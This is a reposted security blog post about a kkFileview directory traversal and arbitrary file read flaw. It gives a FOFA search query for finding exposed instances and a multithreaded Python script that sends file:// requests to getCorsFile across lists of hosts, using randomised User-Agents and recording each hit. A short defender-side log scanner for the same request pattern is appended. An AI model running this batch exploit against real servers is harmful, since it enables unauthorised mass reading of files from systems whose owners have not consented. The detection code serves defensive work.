(Batch PoC) kkFileview Directory Traversal + Arbitrary File Read

admin, 2023-06-21 09:37:56

 


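I ran into this bug while hunting on the Butian public-welfare program. It is an old bug being farmed again; I submitted it to CNVD and got 5 IDs, which are of no great use beyond a little self-consolation.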

 

01

FOFA syntax


body="kkFileview"

 

02

Batch script


import requests
import sys
import urllib3
from argparse import ArgumentParser
import threadpool
from urllib import parse
from time import time
import re
import random

# verify=False is used below, so silence the resulting TLS warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
url_list = []


def get_ua():
    # Build a randomised Chrome User-Agent string
    first_num = random.randint(55, 62)
    third_num = random.randint(0, 3200)
    fourth_num = random.randint(0, 140)
    os_type = [
        '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)',
        '(Macintosh; Intel Mac OS X 10_12_6)'
    ]
    chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)

    ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
                   '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'])
    return ua


def wirte_targets(vurl, filename):
    # Append one result per line
    with open(filename, "a+") as f:
        f.write(vurl + "\n")


def check_url(url):
    # Request a listing of the Windows "etc" directory through getCorsFile;
    # a response containing "hosts" means the file:// URL was served
    vulnurl = url + "/getCorsFile?urlPath=file:///c://windows/system32/drivers/etc"
    headers = {
        'User-Agent': get_ua(),
    }
    try:
        res = requests.get(vulnurl, verify=False, allow_redirects=False,
                           headers=headers, timeout=5)
        if 'hosts' in res.text:
            print("\033[32m[+]{} is vulnerable\033[0m".format(url))
            wirte_targets(vulnurl, "vuln.txt")
        else:
            print("\033[34m[-]{} not vulnerable.\033[0m".format(url))
    except Exception as e:
        print("\033[34m[!]{} request false.\033[0m".format(url))


def multithreading(url_list, pools=5):
    works = []
    for i in url_list:
        # works.append((func_params, None))
        works.append(i)
    # print(works)
    pool = threadpool.ThreadPool(pools)
    reqs = threadpool.makeRequests(check_url, works)
    [pool.putRequest(req) for req in reqs]
    pool.wait()


if __name__ == '__main__':
    arg = ArgumentParser(description='check_url By m2')
    arg.add_argument("-u", "--url", help="Target URL; Example:http://ip:port")
    arg.add_argument("-f", "--file", help="Target URL; Example:url.txt")
    args = arg.parse_args()
    url = args.url
    filename = args.file
    print("[+]任务开始.....")
    start = time()
    if url != None and filename == None:
        check_url(url)
    elif url == None and filename != None:
        # One URL per line in the input file
        with open(filename) as f:
            for i in f:
                i = i.replace('\n', '')
                url_list.append(i)
        multithreading(url_list, 10)
    end = time()
    print('任务完成,用时%ds.' % (end - start))
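
A defender-side counterpart to the check above, as an added example that is not part of the original post: it scans web access logs for /getCorsFile requests whose urlPath is not an http(s) URL. The combined log format, the sample lines and the http/https allowlist are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (not taken from the post).
SAMPLE_LOG = """\
203.0.113.7 - - [21/Jun/2023:09:40:01 +0800] "GET /getCorsFile?urlPath=file:///c://windows/system32/drivers/etc HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Jun/2023:09:40:02 +0800] "GET /getCorsFile?urlPath=file%3A%2F%2F%2Fc%3A%2F%2Fwindows%2Fsystem32%2Fdrivers%2Fetc HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [21/Jun/2023:09:41:10 +0800] "GET /getCorsFile?urlPath=http://files.example.internal/a.docx HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
198.51.100.9 - - [21/Jun/2023:09:41:12 +0800] "GET /index HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Assumption: this deployment only ever previews documents fetched over http(s).
ALLOWED_SCHEMES = {"http", "https"}


def suspicious_requests(log_text):
    """Return (client_ip, status, decoded urlPath) for each /getCorsFile
    request whose urlPath scheme is outside ALLOWED_SCHEMES."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if not parts.path.lower().endswith("/getcorsfile"):
            continue
        # parse_qs percent-decodes, so encoded and plain forms compare equal.
        for value in parse_qs(parts.query).get("urlPath", []):
            if urlsplit(value).scheme.lower() not in ALLOWED_SCHEMES:
                hits.append((m["ip"], int(m["status"]), value))
    return hits


if __name__ == "__main__":
    for ip, status, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} status={status} urlPath={value}")
```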



Originally published on the WeChat official account 阿呆攻防: (Batch PoC) kkFileview Directory Traversal + Arbitrary File Read

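  • This article was published on 2023-06-21 09:37:56
  • When reposting, please keep the link to this article (CN-SEC中文网: thanks to the original author for the hard work):
                   (Batch PoC) kkFileview Directory Traversal + Arbitrary File Read http://cn-sec.com/archives/1822518.html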
